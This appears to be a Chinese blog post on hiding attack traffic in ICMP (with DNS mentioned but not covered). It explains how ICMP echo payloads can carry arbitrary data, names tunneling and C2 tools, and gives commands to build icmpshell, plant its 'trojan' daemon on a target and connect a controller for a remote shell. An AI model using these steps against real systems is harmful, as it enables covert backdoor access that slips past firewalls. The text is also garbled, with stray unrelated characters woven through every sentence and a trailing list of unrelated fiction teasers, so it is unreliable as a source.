攻擊隱蔽技術(shù)(ICMP谤牡、DNS)

1ICMP:

原理 - 繞過WAF(多數(shù)防火墻未對ICMP流量做限制)
工具相關(guān) PiX-C2、icmpsh姥宝、Nishang結(jié)合icmpsh 翅萤、ptunnel 、icmpshell

一腊满、技術(shù)實現(xiàn)原理:

IP協(xié)議并不是一個可靠的協(xié)議套么,它不保證數(shù)據(jù)被送達培己,那么,自然的胚泌,保證數(shù)據(jù)送達的工作應該由其他的模塊來完成省咨。其中一個重要的模塊就是ICMP(網(wǎng)絡控制報文)協(xié)議。

ICMP數(shù)據(jù)包由8bit的錯誤類型和8bit的代碼和16bit的校驗和組成玷室。而前 16bit就組成了ICMP所要傳遞的信息零蓉。

如下是icmp的結(jié)構(gòu)圖,

image.png

請求端的 Ping 工具通常會在 ICMP 數(shù)據(jù)包后面附加上一段隨機的數(shù)據(jù)作為 Payload穷缤,而響應端則會拷貝這段 Payload 到 ICMP 響應數(shù)據(jù)包中返還給請求端敌蜂,用于識別和匹配 Ping 請求(Windows 和 Linux 系統(tǒng)下的Ping 工具默認的 Payload 長度為 64bit,但實際上協(xié)議允許附加最大 64K 大小的Payload)津肛。

image.png

最后一個 Payload 字段是可以存放任何數(shù)據(jù)的章喉,長度的話 理論上 ICMP 包外的 IP 包長度不超過 MTU 即可,但是實際上傳不了那么大快耿。

icmp本身比較簡單囊陡,有一個字節(jié)的類型和一個字節(jié)的代碼和兩個字節(jié)的校驗碼,其他為數(shù)據(jù)部分掀亥,icmp攜帶的數(shù)據(jù)部分默認是32字節(jié)。而且攜帶的數(shù)據(jù)在windows中永遠是:abcdefghijklmnopqrstuvwabcdefghi

image.png
看了icmp協(xié)議的結(jié)構(gòu)妥色,你是不是在想搪花,data數(shù)據(jù)的內(nèi)容能否換成我自己想傳輸?shù)臄?shù)據(jù)呢?這就是icmp隧道的精髓了嘹害,icmp隧道就是要替換掉data部分數(shù)據(jù)撮竿。

那我們能否改變這些data填充我們自己的數(shù)據(jù)呢? 答案是當然是可以的笔呀!

在icmp data中的數(shù)據(jù)進行更改后幢踏,目標設備能否解析內(nèi)容呢,這就需要工具代替系統(tǒng)自身模塊了许师。
一個隧道工具房蝉,允許您通過可靠的 TCP 隧道連接一個遠程主機,并使用 ICMP 回送請求和應答包微渠,俗稱 ping 請求和回復搭幻。

木馬控制:

編譯icmpshell,編譯成功后會生成兩個可執(zhí)行文件,ish是控制端,ishd是木馬端

icmpsh
icmptunnel

cd icmpshell

make linux

首先,在目標機器MidLAMP上執(zhí)行木馬端:

-i 指定木馬端端口
-t 指定icmp類型
-p 指定單包大小

./ishd -i 443 -t 0 -p 1024 &

然后,再回到本地機器lnmp01上執(zhí)行控制端進行連接,程序有值得改進的地方,如,設置連接密碼:

./ish -i 443 -t 0 -p 1024 192.168.3.19

工具 Dnscat2

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市逞盆,隨后出現(xiàn)的幾起案子檀蹋,更是在濱河造成了極大的恐慌,老刑警劉巖云芦,帶你破解...
    沈念sama閱讀 217,542評論 6 504
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件俯逾,死亡現(xiàn)場離奇詭異贸桶,居然都是意外死亡,警方通過查閱死者的電腦和手機桌肴,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,822評論 3 394
  • 文/潘曉璐 我一進店門刨啸,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人识脆,你說我怎么就攤上這事设联。” “怎么了灼捂?”我有些...
    開封第一講書人閱讀 163,912評論 0 354
  • 文/不壞的土叔 我叫張陵离例,是天一觀的道長。 經(jīng)常有香客問我悉稠,道長宫蛆,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,449評論 1 293
  • 正文 為了忘掉前任的猛,我火速辦了婚禮耀盗,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘卦尊。我一直安慰自己叛拷,他們只是感情好,可當我...
    茶點故事閱讀 67,500評論 6 392
  • 文/花漫 我一把揭開白布岂却。 她就那樣靜靜地躺著忿薇,像睡著了一般。 火紅的嫁衣襯著肌膚如雪躏哩。 梳的紋絲不亂的頭發(fā)上署浩,一...
    開封第一講書人閱讀 51,370評論 1 302
  • 那天,我揣著相機與錄音扫尺,去河邊找鬼筋栋。 笑死,一個胖子當著我的面吹牛正驻,可吹牛的內(nèi)容都是我干的弊攘。 我是一名探鬼主播,決...
    沈念sama閱讀 40,193評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼拨拓,長吁一口氣:“原來是場噩夢啊……” “哼肴颊!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起渣磷,我...
    開封第一講書人閱讀 39,074評論 0 276
  • 序言:老撾萬榮一對情侶失蹤婿着,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體竟宋,經(jīng)...
    沈念sama閱讀 45,505評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡提完,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,722評論 3 335
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了丘侠。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片徒欣。...
    茶點故事閱讀 39,841評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖蜗字,靈堂內(nèi)的尸體忽然破棺而出打肝,到底是詐尸還是另有隱情,我是刑警寧澤挪捕,帶...
    沈念sama閱讀 35,569評論 5 345
  • 正文 年R本政府宣布粗梭,位于F島的核電站,受9級特大地震影響级零,放射性物質(zhì)發(fā)生泄漏断医。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,168評論 3 328
  • 文/蒙蒙 一奏纪、第九天 我趴在偏房一處隱蔽的房頂上張望鉴嗤。 院中可真熱鬧,春花似錦序调、人聲如沸醉锅。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,783評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽荣挨。三九已至,卻和暖如春朴摊,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背此虑。 一陣腳步聲響...
    開封第一講書人閱讀 32,918評論 1 269
  • 我被黑心中介騙來泰國打工甚纲, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人朦前。 一個月前我還...
    沈念sama閱讀 47,962評論 2 370
  • 正文 我出身青樓介杆,卻偏偏與公主長得像,于是被迫代替她去往敵國和親韭寸。 傳聞我的和親對象是個殘疾皇子春哨,可洞房花燭夜當晚...
    茶點故事閱讀 44,781評論 2 354